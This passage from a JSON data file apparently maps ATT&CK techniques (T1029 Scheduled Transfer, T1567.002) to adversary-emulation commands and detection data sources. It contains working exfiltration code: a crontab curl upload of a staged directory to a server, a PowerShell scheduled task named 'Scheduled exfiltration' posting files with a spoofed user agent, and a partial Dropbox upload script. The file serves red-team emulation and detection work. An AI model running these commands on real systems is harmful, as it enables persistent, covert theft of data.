opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": 
"Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1029", + "command_list": [ + "crontab -l > /tmp/origcron;\ncrontab -l > /tmp/mycron;\necho \"0 12 * * * curl -F \"data=@#{host.dir.compress}\" --header \"X-Request-ID: `hostname`-#{paw}\" #{server}/file/upload\" >> /tmp/mycron;\ncrontab /tmp/mycron;\n", + "$commandString = '$fieldName = \\\"#{host.dir.compress}\";\n$filePath = \\\"#{host.dir.compress}\";\n$url = \\\"#{server}/file/upload\\\";\nAdd-Type -AssemblyName \\\"System.Net.Http\\\";\n\n$client = New-Object System.Net.Http.HttpClient;\n$content = New-Object System.Net.Http.MultipartFormDataContent;\n$fileStream = [System.IO.File]::OpenRead($filePath);\n$fileName = [System.IO.Path]::GetFileName($filePath);\n$fileContent = New-Object System.Net.Http.StreamContent($fileStream);\n\n$xRequestIdHeader = \\\"X-Request-Id\\\";\n$xRequestIdField = $env:COMPUTERNAME + \\\"-#{paw}\\\";\n$content.Add($fileContent, $fieldName, $fileName);\n$client.DefaultRequestHeaders.Add($xRequestIdHeader, $xRequestIdField);\n\n$userAgentHeader = \\\"User-Agent\\\";\n$userAgentField = \\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\\\";\n$client.DefaultRequestHeaders.Add($userAgentHeader, $userAgentField);\n$result = $client.PostAsync($url, 
$content).Result;$result.EnsureSuccessStatusCode();';\n\n$action = New-ScheduledTaskAction -Execute \"powershell.exe\" -Argument \"$commandString\";\n$trigger = New-ScheduledTaskTrigger -Once -At 12pm;\n\nRegister-ScheduledTask -TaskName \"Scheduled exfiltration\" -Trigger $trigger -Action $action;\n" + ], + "commands": [ + { + "command": "crontab -l > /tmp/origcron;\ncrontab -l > /tmp/mycron;\necho \"0 12 * * * curl -F \"data=@#{host.dir.compress}\" --header \"X-Request-ID: `hostname`-#{paw}\" #{server}/file/upload\" >> /tmp/mycron;\ncrontab /tmp/mycron;\n", + "source": "data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml", + "name": "This ability exfiltrates the staged directory at a scheduled time." + }, + { + "command": "$commandString = '$fieldName = \\\"#{host.dir.compress}\";\n$filePath = \\\"#{host.dir.compress}\";\n$url = \\\"#{server}/file/upload\\\";\nAdd-Type -AssemblyName \\\"System.Net.Http\\\";\n\n$client = New-Object System.Net.Http.HttpClient;\n$content = New-Object System.Net.Http.MultipartFormDataContent;\n$fileStream = [System.IO.File]::OpenRead($filePath);\n$fileName = [System.IO.Path]::GetFileName($filePath);\n$fileContent = New-Object System.Net.Http.StreamContent($fileStream);\n\n$xRequestIdHeader = \\\"X-Request-Id\\\";\n$xRequestIdField = $env:COMPUTERNAME + \\\"-#{paw}\\\";\n$content.Add($fileContent, $fieldName, $fileName);\n$client.DefaultRequestHeaders.Add($xRequestIdHeader, $xRequestIdField);\n\n$userAgentHeader = \\\"User-Agent\\\";\n$userAgentField = \\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\\\";\n$client.DefaultRequestHeaders.Add($userAgentHeader, $userAgentField);\n$result = $client.PostAsync($url, $content).Result;$result.EnsureSuccessStatusCode();';\n\n$action = New-ScheduledTaskAction -Execute \"powershell.exe\" -Argument \"$commandString\";\n$trigger = New-ScheduledTaskTrigger -Once -At 12pm;\n\nRegister-ScheduledTask -TaskName 
\"Scheduled exfiltration\" -Trigger $trigger -Action $action;\n", + "source": "data/abilities/exfiltration/110cea7a-5b03-4443-92ee-7ccefaead451.yml", + "name": "This ability exfiltrates the staged directory at a scheduled time." + } + ], + "parsed_datasets": [ + { + "id": "110cea7a-5b03-4443-92ee-7ccefaead451", + "name": "Scheduled Exfiltration", + "description": "This ability exfiltrates the staged directory at a scheduled time.", + "tactic": "exfiltration", + "technique": { + "attack_id": "T1029", + "name": "Scheduled Transfer" + }, + "platforms": { + "linux": { + "sh": { + "command": "crontab -l > /tmp/origcron;\ncrontab -l > /tmp/mycron;\necho \"0 12 * * * curl -F \"data=@#{host.dir.compress}\" --header \"X-Request-ID: `hostname`-#{paw}\" #{server}/file/upload\" >> /tmp/mycron;\ncrontab /tmp/mycron;\n", + "cleanup": "rm /tmp/mycron;\ncrontab /tmp/origcron;\nrm /tmp/origcron;\n" + } + }, + "windows": { + "psh": { + "command": "$commandString = '$fieldName = \\\"#{host.dir.compress}\";\n$filePath = \\\"#{host.dir.compress}\";\n$url = \\\"#{server}/file/upload\\\";\nAdd-Type -AssemblyName \\\"System.Net.Http\\\";\n\n$client = New-Object System.Net.Http.HttpClient;\n$content = New-Object System.Net.Http.MultipartFormDataContent;\n$fileStream = [System.IO.File]::OpenRead($filePath);\n$fileName = [System.IO.Path]::GetFileName($filePath);\n$fileContent = New-Object System.Net.Http.StreamContent($fileStream);\n\n$xRequestIdHeader = \\\"X-Request-Id\\\";\n$xRequestIdField = $env:COMPUTERNAME + \\\"-#{paw}\\\";\n$content.Add($fileContent, $fieldName, $fileName);\n$client.DefaultRequestHeaders.Add($xRequestIdHeader, $xRequestIdField);\n\n$userAgentHeader = \\\"User-Agent\\\";\n$userAgentField = \\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\\\";\n$client.DefaultRequestHeaders.Add($userAgentHeader, $userAgentField);\n$result = $client.PostAsync($url, 
$content).Result;$result.EnsureSuccessStatusCode();';\n\n$action = New-ScheduledTaskAction -Execute \"powershell.exe\" -Argument \"$commandString\";\n$trigger = New-ScheduledTaskTrigger -Once -At 12pm;\n\nRegister-ScheduledTask -TaskName \"Scheduled exfiltration\" -Trigger $trigger -Action $action;\n", + "cleanup": "Unregister-ScheduledTask -TaskName \"Scheduled exfiltration\" -Confirm:$false;" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "100-200", + "Scheduled Tasks" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "100-200", + "Scheduled Tasks" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1567.002", + "command_list": [ + "$SourceFile = (Get-Item #{host.dir.compress});\n$RemoteName = \"$(Get-Date -Format yyyymmddhhmmss)-exfil-#{paw}-$($SourceFile.name)\";\n$TargetFilePath = \"/#{dropbox.target.dir}/$RemoteName\";\n$ApiKey = \"#{dropbox.api.key}\";\n\n$url = \"https://content.dropboxapi.com/2/files/upload\";\n\n$file = [IO.File]::ReadAllBytes($SourceFile);\n[net.httpWebRequest] $req = [net.webRequest]::create($url);\n\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }';\n$authorization = \"Bearer \" + $ApiKey;\n\n$req.method = \"POST\";\n$req.Headers.Add(\"Authorization\", $authorization);\n$req.Headers.Add(\"Dropbox-API-Arg\", $arg);\n$req.ContentType = 